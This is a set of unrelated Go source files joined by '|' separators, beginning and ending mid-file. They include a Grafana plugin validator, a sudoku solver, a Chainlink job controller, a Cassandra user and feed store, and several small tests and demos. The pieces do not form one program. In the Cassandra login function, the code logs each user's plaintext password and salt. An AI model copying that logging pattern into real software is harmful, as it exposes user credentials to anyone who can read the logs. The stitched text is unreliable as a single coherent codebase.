if bytes.Contains(ctx.Readme, []byte(word)) {
found = append(found, word)
}
}
if len(found) > 0 {
return []ValidationComment{
{
Severity: checkSeverityWarning,
Message: "README contains developer jargon",
Details: "Grafana uses the README within the application to help users understand how to use your plugin. Instructions for building and testing the plugin can be confusing for the end user. You can maintain separate instructions for users and developers by replacing the README in the dist directory with the user documentation.",
},
}, nil
}
return nil, nil
}
type distExistsChecker struct{}
func (c *distExistsChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var errs []ValidationComment
_, err := os.Stat(ctx.DistDir)
if err != nil {
if os.IsNotExist(err) {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: "Missing dist directory",
Details: "Grafana requires a production build of your plugin. Run `yarn build` and `git add -f dist/` in your release branch to add the production build.",
})
return errs, nil
}
return nil, err
}
return errs, nil
}
type pluginIDHasTypeSuffixChecker struct{}
// check checks that the type in the plugin ID is the same as the type defined
// in plugin.json.
func (c *pluginIDHasTypeSuffixChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var data struct {
ID string `json:"id"`
Type string `json:"type"`
}
if err := json.Unmarshal(ctx.Metadata, &data); err != nil {
return nil, err
}
if data.Type == "" {
return nil, nil
}
idParts := strings.Split(data.ID, "-")
if idParts[len(idParts)-1] != data.Type {
return []ValidationComment{
{
Severity: checkSeverityError,
Message: "Plugin ID and type doesn't match",
Details: fmt.Sprintf(`The plugin ID must end with the plugin type. Add "-%s" at the end of your plugin ID.`, data.Type),
},
}, nil
}
return nil, nil
}
type pluginIDFormatChecker struct{}
// check checks whether the plugin ID follows the naming conventions.
func (c *pluginIDFormatChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var data struct {
ID string `json:"id"`
}
if err := json.Unmarshal(ctx.Metadata, &data); err != nil {
return nil, err
}
var errs []ValidationComment
if data.ID != "" {
parts := len(strings.Split(data.ID, "-"))
if parts < 2 || parts > 3 {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: "Invalid ID format",
Details: "A plugin ID must have the form `<username>-<name>-<type>` or `<username>-<type>`, where\n\n- `username` is the [Grafana.com](https://grafana.com) account that owns the plugin\n- `name` is the name of the plugin\n- `type` is the type of the plugin and must be one of `panel`, `datasource`, or `app`",
})
}
}
return errs, nil
}
type pluginNameChecker struct{}
// check checks whether the plugin ID and name are the same.
func (c *pluginNameChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var data struct {
ID string `json:"id"`
Name string `json:"name"`
}
if err := json.Unmarshal(ctx.Metadata, &data); err != nil {
return nil, err
}
var errs []ValidationComment
if data.ID != "" && data.Name != "" && data.ID == data.Name {
errs = append(errs, ValidationComment{
Severity: checkSeverityWarning,
Message: "Plugin name and ID are the same",
Details: "While the `id` property must be readable by a machine, the `name` of a plugin should be human-friendly.",
})
}
return errs, nil
}
type jsonSchemaChecker struct {
schema string
}
// check validates the plugin.json file against a JSON Schema.
func (c *jsonSchemaChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var errs []ValidationComment
// gojsonschema requires absolute path to the schema.
schemaPath, err := filepath.Abs(c.schema)
if err != nil {
return nil, err
}
schemaLoader := gojsonschema.NewReferenceLoader("file://" + schemaPath)
documentLoader := gojsonschema.NewReferenceLoader("file://" + ctx.MetadataPath)
result, err := gojsonschema.Validate(schemaLoader, documentLoader)
if err != nil {
return nil, err
}
if !result.Valid() {
for _, desc := range result.Errors() {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: "Invalid plugin.json",
Details: fmt.Sprintf("`%s`: %s\n\nFor more information, refer to the [reference documentation](https://grafana.com/docs/grafana/latest/developers/plugins/metadata/).", desc.Field(), desc.Description()),
})
}
}
return errs, nil
}
type packageVersionMatchChecker struct {
schema string
}
// check checks that the version specified in package.json is the same as the
// version in plugin.json.
func (c *packageVersionMatchChecker) check(ctx *checkContext) ([]ValidationComment, error) {
packageFile, err := ioutil.ReadFile(filepath.Join(ctx.RootDir, "package.json"))
if err != nil {
return nil, err
}
var pkg struct {
Version string `json:"version"`
}
if err := json.Unmarshal(packageFile, &pkg); err != nil {
return nil, err
}
pluginFile, err := ioutil.ReadFile(filepath.Join(ctx.DistDir, "plugin.json"))
if err != nil {
return nil, err
}
var plugin struct {
Info struct {
Version string `json:"version"`
} `json:"info"`
}
if err := json.Unmarshal(pluginFile, &plugin); err != nil {
return nil, err
}
if plugin.Info.Version != pkg.Version {
return []ValidationComment{
{
Severity: checkSeverityError,
Message: "Mismatched package version",
Details: "The `version` in `package.json` needs to match the `info.version` in `plugin.json. Set `info.version` in `plugin.json` to `%VERSION%` to use the version found in package.json when building the plugin.",
},
}, nil
}
return nil, nil
}
type logosExistChecker struct{}
// check checks whether the specified logos exists.
func (c *logosExistChecker) check(ctx *checkContext) ([]ValidationComment, error) {
path, err := fallbackDir("plugin.json", ctx.DistDir, ctx.SrcDir)
if err != nil {
if err == errFileNotFound {
return nil, nil
}
return nil, err
}
pluginFile, err := ioutil.ReadFile(path)
if err != nil {
return nil, err
}
var plugin struct {
Info struct {
Logos struct {
Small string `json:"small"`
Large string `json:"large"`
} `json:"logos"`
} `json:"info"`
}
if err := json.Unmarshal(pluginFile, &plugin); err != nil {
return nil, err
}
var errs []ValidationComment
// Check for small logo.
if plugin.Info.Logos.Small != "" {
smallPath := filepath.Join(ctx.SrcDir, plugin.Info.Logos.Small)
if _, err := os.Stat(smallPath); err != nil {
if os.IsNotExist(err) {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: fmt.Sprintf("File not found: %q", plugin.Info.Logos.Small),
Details: "We couldn't find the specified file. Make sure that the file exists.",
})
}
}
}
// Check for large logo.
if plugin.Info.Logos.Large != "" {
largePath := filepath.Join(ctx.SrcDir, plugin.Info.Logos.Large)
if _, err := os.Stat(largePath); err != nil {
if os.IsNotExist(err) {
errs = append(errs, ValidationComment{
Severity: checkSeverityError,
Message: fmt.Sprintf("File not found: %q", plugin.Info.Logos.Large),
Details: "We couldn't find the specified file. Make sure that the file exists.",
})
}
}
}
return errs, nil
}
type orgExistsChecker struct {
username string
client *grafana.Client
}
// check checks whether a Grafana.com account exists for a given username.
func (c *orgExistsChecker) check(ctx *checkContext) ([]ValidationComment, error) {
_, err := c.client.FindOrgBySlug(c.username)
if err != nil {
if err == grafana.ErrOrganizationNotFound {
return []ValidationComment{
{
Severity: checkSeverityError,
Message: "Missing Grafana.com account",
Details: fmt.Sprintf("The first part of the plugin ID must be a valid Grafana.com organization or user. [Sign up on Grafana.com](https://grafana.com/signup/starter/connect-account) to claim **%s**.", c.username),
},
}, nil
} else if err == grafana.ErrPrivateOrganization {
return nil, nil
}
return nil, err
}
return nil, nil
}
type templateReadmeChecker struct{}
// check checks whether a Grafana.com account exists for a given username.
func (c *templateReadmeChecker) check(ctx *checkContext) ([]ValidationComment, error) {
re := regexp.MustCompile("^# Grafana (Panel|Data Source|Data Source Backend) Plugin Template")
m := re.Find(ctx.Readme)
if m != nil {
return []ValidationComment{
{
Severity: checkSeverityWarning,
Message: "Found template README.md",
Details: "It looks like you haven't updated the README.md that was provided by the plugin template. Update the README with information about your plugin and how to use it.",
},
}, nil
}
return nil, nil
}
type pluginPlatformChecker struct{}
// check checks whether a Grafana.com account exists for a given username.
func (c *pluginPlatformChecker) check(ctx *checkContext) ([]ValidationComment, error) {
var modulePath string
var err error
modulePath, err = fallbackDir("module.ts", ctx.DistDir, ctx.SrcDir)
if err != nil {
modulePath, err = fallbackDir("module.js", ctx.DistDir, ctx.SrcDir)
if err != nil {
return nil, nil
}
}
b, err := ioutil.ReadFile(modulePath)
if err != nil {
}
reactExp := regexp.MustCompile(`(DataSourcePlugin|PanelPlugin)`)
angularExp := regexp.MustCompile(`\s(PanelCtrl|QueryCtrl|QueryOptionsCtrl|ConfigCtrl)`)
if angularExp.Match(b) && !reactExp.Match(b) {
return []ValidationComment{
{
Severity: checkSeverityWarning,
Message: "Plugin uses legacy platform",
Details: "Grafana 7.0 introduced a new plugin platform based on [ReactJS](https://reactjs.org/). We currently have no plans of removing support for Angular-based plugins, but we encourage you migrate your plugin to the new platform.",
},
}, nil
}
return nil, nil
}
var errFileNotFound = errors.New("file not found")
// fallbackDir looks for a filename in a number of directories, and returns the
// path to the first path to exist.
func fallbackDir(filename string, dirs ...string) (string, error) {
for _, dir := range dirs {
path := filepath.Join(dir, filename)
ok, err := fileExists(path)
if err != nil {
return "", err
}
if ok {
return path, nil
}
}
return "", errFileNotFound
}
func fileExists(path string) (bool, error) {
if _, err := os.Stat(path); err != nil {
if os.IsNotExist(err) {
return false, nil
}
return false, err
}
return true, nil
}
|
package sinks
import (
"encoding/json"
"fmt"
"os"
"strings"
// "time"
lp "github.com/ClusterCockpit/cc-metric-collector/pkg/ccMetric"
)
type StdoutSink struct {
sink // meta_as_tags, name
output *os.File
config struct {
defaultSinkConfig
Output string `json:"output_file,omitempty"`
}
}
func (s *StdoutSink) Write(m lp.CCMetric) error {
fmt.Fprint(
s.output,
m.ToLineProtocol(s.meta_as_tags),
)
return nil
}
func (s *StdoutSink) Flush() error {
s.output.Sync()
return nil
}
func (s *StdoutSink) Close() {
if s.output != os.Stdout && s.output != os.Stderr {
s.output.Close()
}
}
func NewStdoutSink(name string, config json.RawMessage) (Sink, error) {
s := new(StdoutSink)
s.name = fmt.Sprintf("StdoutSink(%s)", name)
if len(config) > 0 {
err := json.Unmarshal(config, &s.config)
if err != nil {
return nil, err
}
}
s.output = os.Stdout
if len(s.config.Output) > 0 {
switch strings.ToLower(s.config.Output) {
case "stdout":
s.output = os.Stdout
case "stderr":
s.output = os.Stderr
default:
f, err := os.OpenFile(s.config.Output, os.O_CREATE|os.O_WRONLY, os.FileMode(0600))
if err != nil {
return nil, err
}
s.output = f
}
}
// Create lookup map to use meta infos as tags in the output metric
s.meta_as_tags = make(map[string]bool)
for _, k := range s.config.MetaAsTags {
s.meta_as_tags[k] = true
}
return s, nil
}
|
package main
import "fmt"
// 37. 解数独
// 编写一个程序,通过已填充的空格来解决数独问题。
// 一个数独的解法需遵循如下规则:
// 数字 1-9 在每一行只能出现一次。
// 数字 1-9 在每一列只能出现一次。
// 数字 1-9 在每一个以粗实线分隔的 3x3 宫内只能出现一次。
// Note:
// 给定的数独序列只包含数字 1-9 和字符 '.' 。
// 你可以假设给定的数独只有唯一解。
// 给定数独永远是 9x9 形式的。
// https://leetcode-cn.com/problems/sudoku-solver
func main() {
board := [][]byte{
{'5', '3', '.', '.', '7', '.', '.', '.', '.'},
{'6', '.', '.', '1', '9', '5', '.', '.', '.'},
{'.', '9', '8', '.', '.', '.', '.', '6', '.'},
{'8', '.', '.', '.', '6', '.', '.', '.', '3'},
{'4', '.', '.', '8', '.', '3', '.', '.', '1'},
{'7', '.', '.', '.', '2', '.', '.', '.', '6'},
{'.', '6', '.', '.', '.', '.', '2', '8', '.'},
{'.', '.', '.', '4', '1', '9', '.', '.', '5'},
{'.', '.', '.', '.', '8', '.', '.', '7', '9'}}
solveSudoku(board)
fmt.Println(board)
}
// 法一:回溯+位运算
func solveSudoku(board [][]byte) {
var row, line, squ [9]int
for i := 0; i < 9; i++ {
for j := 0; j < 9; j++ {
if board[i][j] != '.' {
num := board[i][j] - '1'
row[i] |= 1 << num
line[j] |= 1 << num
squNo := i/3*3 + j/3
squ[squNo] |= 1 << num
}
}
}
sudokuHelper(board, 0, 0, row, line, squ)
}
func sudokuHelper(board [][]byte, i, j int, row, line, squ [9]int) bool {
if j == 9 {
return sudokuHelper(board, i+1, 0, row, line, squ)
}
if i == 9 {
return true
}
if board[i][j] != '.' {
return sudokuHelper(board, i, j+1, row, line, squ)
}
squNo := i/3*3 + j/3
for b := '1'; b <= '9'; b++ {
n := int(b - '1')
if !checkUsedNum(n, row[i], line[j], squ[squNo]) {
offset := 1 << n
board[i][j] = byte(b)
row[i] |= offset
line[j] |= offset
squ[squNo] |= offset
if sudokuHelper(board, i, j+1, row, line, squ) {
return true
}
board[i][j] = '.'
row[i] ^= offset
line[j] ^= offset
squ[squNo] ^= offset
}
}
return false
}
func checkUsedNum(n, row, col, squ int) bool {
if ((row>>n)&1) == 1 || ((col>>n)&1) == 1 || ((squ>>n)&1) == 1 {
return true
}
return false
}
|
package main
import (
"fmt"
"github.com/nbgucer/advent-of-code-2018/utils"
)
func main() {
fileName := "days\\day-2\\input"
stringSlice := utils.GetInputAsSlice(fileName)
commonIdPart := FindCommonIdPart(stringSlice)
fmt.Printf("\n Result is %v with a closeness of %v within %v \n", commonIdPart, len(commonIdPart), len(stringSlice[0]))
}
func FindCommonIdPart(stringSlice []string) string {
closeness := 0
commonIdPart := ""
for i := 0; i < len(stringSlice); i++ {
for j := i + 1; j < len(stringSlice); j++ {
ResultCommonIdPart := FindCloseness(stringSlice[i], stringSlice[j])
resultCloseness := len(ResultCommonIdPart)
if resultCloseness > closeness {
commonIdPart = ResultCommonIdPart
closeness = resultCloseness
}
}
}
return commonIdPart
}
func FindCloseness(a string, b string) string {
output := ""
for i := 0; i < len(a); i++ {
if a[i] == b[i] {
output += string(a[i])
}
}
return output
}
|
package main
import (
"fmt"
"os"
)
func main() {
address, password, command, err := ParseCommandLineArgs()
printErrAndExit(err)
client, err := NewClient(address)
printErrAndExit(err)
err = client.Login(password)
printErrAndExit(err)
response, err := client.SendCommandNaively(command)
printErrAndExit(err)
fmt.Println(response)
}
func printErrAndExit(err error) {
if err != nil {
fmt.Println(err)
os.Exit(1)
}
}
|
package fakes
import (
bmins "github.com/cloudfoundry/bosh-micro-cli/deployer/instance"
)
type FakeInstanceFactory struct {
CreateMbusURL string
CreateInstance bmins.Instance
}
func NewFakeInstanceFactory() *FakeInstanceFactory {
return &FakeInstanceFactory{}
}
func (f *FakeInstanceFactory) Create(mbusURL string) bmins.Instance {
f.CreateMbusURL = mbusURL
return f.CreateInstance
}
|
package split
import (
"testing"
)
func TestSplitMultiSep(t *testing.T) {
s := "Python,JavaScript Twitter"
result := SplitMultiSep(s, []string{"&",","," "})
t.Logf("result is %v",result)
for i := range result{
t.Log(result[i])
}
} |
package main
import (
"bytes"
"encoding/gob"
"fmt"
"log"
)
type P struct {
X, Y, Z int
Name string
Tags []string
Attr map[string]string
}
type Q struct {
X, Y int32
Name string
Tags []string
Attr map[string]string
}
func main() {
var network bytes.Buffer
enc := gob.NewEncoder(&network) // 初始化编码器
dec := gob.NewDecoder(&network) // 初始化解码器
p := &P{
3,
4,
5,
"test",
[]string{"PHP", "Laravel", "Go"},
map[string]string{"website":"https://xueyuanjun.com"},
}
// 数据编码
err := enc.Encode(p)
if err != nil {
log.Fatal("encode error:", err)
}
// 数据解码(收到数据时)
var q Q
err = dec.Decode(&q)
if err != nil {
log.Fatal("decode error:", err)
}
fmt.Printf("%q: {%d,%d}, Tags: %v, Attr: %v\n", q.Name, q.X, q.Y, q.Tags, q.Attr)
}
|
/*
Copyright 2017, Yoshiki Shibukawa
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package gotomation
import (
"time"
)
type MouseButton int
const (
MouseLeft MouseButton = 1
MouseCenter = 2
MouseRight = 3
)
func easeInOutCubic(values [][2]int, duration time.Duration, callback func([]int) error) error {
count := int(duration / (time.Millisecond * 16))
delta := make([]float64, len(values))
finalValue := make([]int, len(values))
lastValue := make([]int, len(values))
for i, value := range values {
delta[i] = float64(value[1] - value[0])
finalValue[i] = value[1]
lastValue[i] = value[0]
}
if count == 0 {
callback(finalValue)
return nil
}
for f := 0; f < count; f++ {
time.Sleep(time.Millisecond * 16)
if f+1 == count {
callback(finalValue)
break
}
t := float64(f) / float64(count) * 2.0
var dt float64
if t < 1.0 {
dt = 0.5 * t * t * t
} else {
t -= 2
dt = 0.5*t*t*t + 1.0
}
currentValues := make([]int, len(values))
for i, value := range values {
currentValues[i] = value[0] + int(delta[i]*dt)
}
err := callback(currentValues)
if err != nil {
return err
}
}
return nil
}
/*
MoveMouse moves mouse cursor with Robert Penner's Easing Function: easeInOutCubic
http://robertpenner.com/easing/
*/
func (m *Mouse) Move(x, y int, duration time.Duration) error {
sx, sy := m.GetPosition()
return easeInOutCubic([][2]int{{sx, x}, {sy, y}}, duration, func(value []int) error {
return m.MoveQuickly(value[0], value[1])
})
}
func (m *Mouse) Click() error {
return m.ClickWith(MouseLeft)
}
func (m *Mouse) DoubleClick() error {
return m.DoubleClickWith(MouseLeft)
}
func (m *Mouse) Drag(x, y int) error {
return m.DragWith(MouseLeft, x, y)
}
func (m *Mouse) Scroll(x, y int, duration time.Duration) error {
lastValues := []int{0, 0}
return easeInOutCubic([][2]int{{0, x}, {0, y}}, duration, func(values []int) error {
err := m.ScrollQuickly(values[0]-lastValues[0], values[1]-lastValues[1])
copy(lastValues, values)
return err
})
}
|
package naive
import (
"reflect"
"testing"
"github.com/fdingiit/matching-algorithms/matcher"
"github.com/fdingiit/matching-algorithms/test"
)
func TestNaiveMatch(t *testing.T) {
var m matcher.Matcher
m = NewMatcher()
for _, sub := range test.BasicCases {
m.Add(sub.Subscriptions...)
}
for _, tt := range test.BasicCases {
t.Run(tt.Name, func(t *testing.T) {
if got := m.Match(tt.Args.Product); !reflect.DeepEqual(got, tt.Wanted) {
t.Errorf("Match() = %+v, want %+v", got, tt.Wanted)
}
})
}
}
|
// +build ignore
// The thumbnail command produces thumbnails of JPEG files
// whose names are provided on each line o fthe standard input.
//
// The "+build ignore" tag excludes this file from the thumbnail package,
// but it can be compiled as a commadn and run like this:
//
// Run with:
// $ go run main.go
// foo.jpeg
// ^d
package main
import (
"bufio"
"fmt"
"log"
"os"
"github.com/awmorgan/gobook/ch8/thumbnail"
)
func main() {
input := bufio.NewScanner(os.Stdin)
for input.Scan() {
thumb, err := thumbnail.ImageFile(input.Text())
if err != nil {
log.Print(err)
continue
}
fmt.Println(thumb)
}
if err := input.Err(); err != nil {
log.Fatal(err)
}
}
|
package mocking
// DoStuffer is a simple interface
type DoStuffer interface {
DoStuff(input string) error
}
|
package web
import (
"net/http"
"github.com/gin-gonic/gin"
"github.com/pkg/errors"
"github.com/smartcontractkit/chainlink/core/services"
"github.com/smartcontractkit/chainlink/core/services/chainlink"
"github.com/smartcontractkit/chainlink/core/services/offchainreporting"
"github.com/smartcontractkit/chainlink/core/store/models"
"github.com/smartcontractkit/chainlink/core/store/orm"
)
// OCRJobSpecsController manages OCR job spec requests.
type OCRJobSpecsController struct {
App chainlink.Application
}
// Create adds validates, saves, and starts a new OCR job spec.
// Example:
// "<application>/ocr/specs"
func (ocrjsc *OCRJobSpecsController) Create(c *gin.Context) {
jobSpec, err := services.ValidatedOracleSpec(c.Request.Body)
if err != nil {
jsonAPIError(c, http.StatusBadRequest, err)
return
}
config := ocrjsc.App.GetStore().Config
if jobSpec.JobType() == offchainreporting.JobType && !config.Dev() && !config.FeatureOffchainReporting() {
jsonAPIError(c, http.StatusNotImplemented, errors.New("The Offchain Reporting feature is disabled by configuration"))
return
}
jobID, err := ocrjsc.App.AddJobV2(c.Request.Context(), jobSpec)
if err != nil {
jsonAPIError(c, http.StatusInternalServerError, err)
return
}
c.JSON(http.StatusOK, struct {
JobID int32 `json:"jobID"`
}{jobID})
}
// Delete soft deletes an OCR job spec.
// Example:
// "<application>/ocr/specs/:ID"
func (ocrjsc *OCRJobSpecsController) Delete(c *gin.Context) {
jobSpec := models.JobSpecV2{}
err := jobSpec.SetID(c.Param("ID"))
if err != nil {
jsonAPIError(c, http.StatusUnprocessableEntity, err)
return
}
err = ocrjsc.App.DeleteJobV2(c.Request.Context(), jobSpec.ID)
if errors.Cause(err) == orm.ErrorNotFound {
jsonAPIError(c, http.StatusNotFound, errors.New("JobSpec not found"))
return
}
if err != nil {
jsonAPIError(c, http.StatusInternalServerError, err)
return
}
jsonAPIResponseWithStatus(c, nil, "job", http.StatusNoContent)
}
|
package cassandra
import (
"context"
"strconv"
"strings"
"time"
"github.com/afex/hystrix-go/hystrix"
"github.com/ankurs/Feed/Feed/service/store/db"
"github.com/carousell/Orion/utils/errors"
"github.com/carousell/Orion/utils/log"
"github.com/carousell/Orion/utils/spanutils"
"github.com/gocql/gocql"
"github.com/pborman/uuid"
)
type cas struct {
casSes *gocql.Session
consistency gocql.Consistency
}
func (c *cas) CassandraExec(ctx context.Context, name, query string, values []interface{}, dest []interface{}) error {
return c.CassandraExecWithConsistency(ctx, name, query, values, dest, c.consistency)
}
func (c *cas) CassandraExecWithConsistency(ctx context.Context, name, query string, values []interface{}, dest []interface{}, cons gocql.Consistency) error {
// zipkin span
span, ctx := spanutils.NewDatastoreSpan(ctx, name, "Cassandra")
defer span.Finish()
span.SetQuery(query)
span.SetTag("values", values)
var casError error
e := hystrix.Do(name, func() error {
q := c.casSes.Query(query, values...).Consistency(cons)
if len(dest) == 0 {
casError = q.Exec()
} else {
casError = q.Scan(dest...)
}
// don't count gocql.ErrNotFound in hystrix
if casError == gocql.ErrNotFound {
return nil
}
return casError
}, nil)
if e != nil {
span.SetError(e.Error())
return errors.Wrap(e, name)
}
if casError == gocql.ErrNotFound {
return db.ErrNotFound
}
return casError
}
func (c *cas) CassandraGetQuery(ctx context.Context, name, query string, values []interface{}, cons gocql.Consistency) *gocql.Query {
// zipkin span
span, ctx := spanutils.NewDatastoreSpan(ctx, name, "Cassandra")
defer span.Finish()
span.SetQuery(query)
span.SetTag("values", values)
return c.casSes.Query(query, values...).Consistency(cons)
}
func (c *cas) AddFollowing(ctx context.Context, userId, followingId string) error {
name := "AddFollowing"
query := "INSERT INTO follow.following (user, following) VALUES (?,?)"
return errors.Wrap(
c.CassandraExec(
ctx, name, query,
db.BuildInterface(userId, followingId),
db.BuildInterface(),
),
name)
}
func (c *cas) AddFollower(ctx context.Context, userId, followerId string) error {
name := "AddFollower"
query := "INSERT INTO follow.follower (user, follower) VALUES (?,?)"
return errors.Wrap(
c.CassandraExec(
ctx, name, query,
db.BuildInterface(userId, followerId),
db.BuildInterface(),
),
name)
}
func (c *cas) RemoveFollowing(ctx context.Context, userId, followingId string) error {
name := "RemoveFollowing"
query := "DELETE FROM follow.following WHERE user= ? AND following = ?"
return errors.Wrap(
c.CassandraExec(
ctx, name, query,
db.BuildInterface(userId, followingId),
db.BuildInterface(),
),
name)
}
func (c *cas) RemoveFollower(ctx context.Context, userId, followerId string) error {
name := "RemoveFollower"
query := "DELETE FROM follow.follower WHERE user = ? AND follower = ?"
return errors.Wrap(
c.CassandraExec(
ctx, name, query,
db.BuildInterface(userId, followerId),
db.BuildInterface(),
),
name)
}
func (c *cas) CheckUserName(ctx context.Context, username string) (string, error) {
name := "CheckUsername"
query := "SELECT email FROM user.users WHERE username = ?"
email := ""
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(username),
db.BuildInterface(&email),
)
return email, errors.Wrap(err, name)
}
func (c *cas) CheckEmail(ctx context.Context, email string) (string, error) {
name := "CheckEmail"
query := "SELECT email FROM user.users WHERE email = ?"
mail := ""
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(email),
db.BuildInterface(&mail),
)
return mail, errors.Wrap(err, name)
}
func (c *cas) CheckLogin(ctx context.Context, username, password string, hash func(context.Context, string, string) string) (db.UserInfo, error) {
username = strings.ToLower(username)
name := "CheckLogin"
query := "SELECT id,password,salt,email,firstname,lastname FROM user.users WHERE username = ?"
id := ""
pwd := ""
salt := ""
email := ""
firstname := ""
lastname := ""
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(username),
db.BuildInterface(&id, &pwd, &salt, &email, &firstname, &lastname),
)
if err == nil {
log.Info(ctx, "salt", salt, "Password", password)
if hash(ctx, password, salt) == pwd {
return userInfo{
email: email,
firstname: firstname,
lastname: lastname,
username: username,
id: id,
}, nil
} else {
return nil, db.ErrNotFound
}
}
return nil, errors.Wrap(err, name)
}
func (c *cas) CreateUser(ctx context.Context, req db.UserInfo, password string, hash func(context.Context, string, string) string) (string, error) {
name := "CreateUser"
id := uuid.New()
salt := uuid.New() // TODO replace with crypto secure salt generation
query := "INSERT INTO user.users (id, email, firstname, lastname, username, password, salt) VALUES (?,?,?,?,?,?,?)"
password = hash(ctx, password, salt)
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(id, req.GetEmail(), req.GetFirstName(), req.GetLastName(), strings.ToLower(req.GetUserName()), password, salt),
db.BuildInterface(),
)
if err != nil {
return "", errors.Wrap(err, name)
}
return id, nil
}
func (c *cas) GetUser(ctx context.Context, userID string) (db.UserInfo, error) {
name := "GetUser"
query := "SELECT username,email,firstname,lastname FROM user.users WHERE id= ?"
username := ""
email := ""
firstname := ""
lastname := ""
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(userID),
db.BuildInterface(&username, &email, &firstname, &lastname),
)
if err == nil {
return userInfo{
email: email,
firstname: firstname,
lastname: lastname,
username: username,
id: userID,
}, nil
}
return nil, errors.Wrap(err, name)
}
func (c *cas) AddUserFeedItem(ctx context.Context, userId, itemId string, ts time.Time) error {
return c.addFeedEntry(ctx, userId, itemId, ts, "feed.user")
}
func (c *cas) AddFollowingFeedItem(ctx context.Context, userId, itemId string, ts time.Time) error {
return c.addFeedEntry(ctx, userId, itemId, ts, "feed.following")
}
func (c *cas) addFeedEntry(ctx context.Context, userId, itemId string, ts time.Time, table string) error {
name := "AddFeedEntry" + table
query := "INSERT INTO " + table + " (user, ts, feed) VALUES (?,?,?)"
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(userId, ts, itemId),
db.BuildInterface(),
)
if err != nil {
return errors.Wrap(err, name)
}
return nil
}
func (c *cas) CreateFeedItem(ctx context.Context, fi db.FeedInfo, ts time.Time) (string, error) {
name := "CreateFeedItem"
query := "INSERT INTO feed.items (id, actor, verb, cverb, object, target, ts) VALUES (?,?,?,?,?,?,?)"
id := uuid.New()
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(id, fi.GetActor(), fi.GetVerb(), fi.GetCVerb(), fi.GetObject(), fi.GetTarget(), ts),
db.BuildInterface(),
)
if err != nil {
return "", errors.Wrap(err, name)
}
return id, nil
}
type dbData struct {
id string
err error
}
func (d dbData) GetError() error {
return d.err
}
func (d dbData) GetId() string {
return d.id
}
func (c *cas) GetFollowers(ctx context.Context, userId string) <-chan db.Data {
name := "GetFollowers"
query := "SELECT follower FROM follow.follower WHERE user = ?"
q := c.CassandraGetQuery(
ctx, name, query,
db.BuildInterface(userId),
c.consistency,
)
data := make(chan db.Data, 5)
scanner := q.Iter().Scanner()
go func() {
defer close(data)
for scanner.Next() {
follower := ""
d := dbData{}
err := scanner.Scan(&follower)
if err != nil {
d.err = err
} else {
d.id = follower
}
select {
case data <- dbData{id: follower, err: err}:
case <-ctx.Done():
// close if context is done
return
}
}
}()
return data
}
func (c *cas) FetchFeed(ctx context.Context, userId string, before time.Time, ftype int32, limit int) ([]string, error) {
name := "FetchFeed"
table := "feed.following"
if ftype == db.USER_FEED {
table = "feed.user"
}
if limit < 0 {
limit = 20
} else if limit > 50 {
limit = 50
}
query := "SELECT feed FROM " + table + " WHERE user = ? AND ts < ? LIMIT " + strconv.Itoa(limit)
q := c.CassandraGetQuery(
ctx, name, query,
db.BuildInterface(userId, before),
c.consistency,
)
feeds := make([]string, 0)
scanner := q.Iter().Scanner()
for scanner.Next() {
feed := ""
err := scanner.Scan(&feed)
if err != nil {
return []string{}, err
}
feeds = append(feeds, feed)
}
return feeds, nil
}
func (c *cas) FetchFeedItem(ctx context.Context, feedId string) (db.FeedInfo, error) {
name := "FetchFeedItem"
query := "SELECT actor, verb, cverb, object, target, ts FROM feed.items WHERE id = ?"
actor := ""
verb := ""
cverb := ""
object := ""
target := ""
ts := time.Time{}
err := c.CassandraExec(
ctx, name, query,
db.BuildInterface(feedId),
db.BuildInterface(&actor, &verb, &cverb, &object, &target, &ts),
)
if err == nil {
return feedInfo{
id: feedId,
actor: actor,
verb: verb,
cverb: cverb,
object: object,
ts: ts.Unix(),
}, nil
}
return nil, errors.Wrap(err, name)
}
func (c *cas) Close() {
if c.casSes != nil {
c.casSes.Close()
}
}
func New(config Config) (Cassandra, error) {
cluster := gocql.NewCluster(config.Hosts...)
ses, err := cluster.CreateSession()
if err != nil {
log.Error(context.Background(), err)
return nil, errors.Wrap(err, "New Cassandra connection")
}
return &cas{
casSes: ses,
consistency: gocql.LocalQuorum,
}, nil
}
|
package dalmodel
import (
"github.com/jinzhu/gorm"
)
type Chat struct {
gorm.Model
Hashtags []Hashtag `gorm:"many2many:chat_hashtags;"`
}
type Message struct {
gorm.Model
Text string
Reply []Reply `gorm:"many2many:message_replies;"`
}
type Reply struct {
gorm.Model
Text string
}
|
package goxtremio
import (
"fmt"
"testing"
)
func TestGetInitiatorGroupByID(*testing.T) {
initiator, err := c.GetInitiatorGroup("4", "")
if err != nil {
panic(err)
}
fmt.Println(fmt.Sprintf("%+v", initiator))
}
func TestGetInitiatorGroupByName(*testing.T) {
initiator, err := c.GetInitiatorGroup("", "VPLEX-ee20")
if err != nil {
panic(err)
}
fmt.Println(fmt.Sprintf("%+v", initiator))
}
func TestGetInitiatorGroups(*testing.T) {
initiators, err := c.GetInitiatorGroups()
if err != nil {
panic(err)
}
fmt.Println(fmt.Sprintf("%+v", initiators))
}
|
package main
import (
"bufio"
"fmt"
"os"
"strconv"
"strings"
"time"
)
type sessionRecord struct {
Idx int
Type string
Module string
CorrectRatio float64
}
func main() {
t := time.Unix(1558026985, 0)
fmt.Println(t)
fmt.Println(t.Format("2006-01-02"))
f2, _ := os.Open("/Users/yongweixing/dev/darwin_seq/darwin_order.tsv")
defer f2.Close()
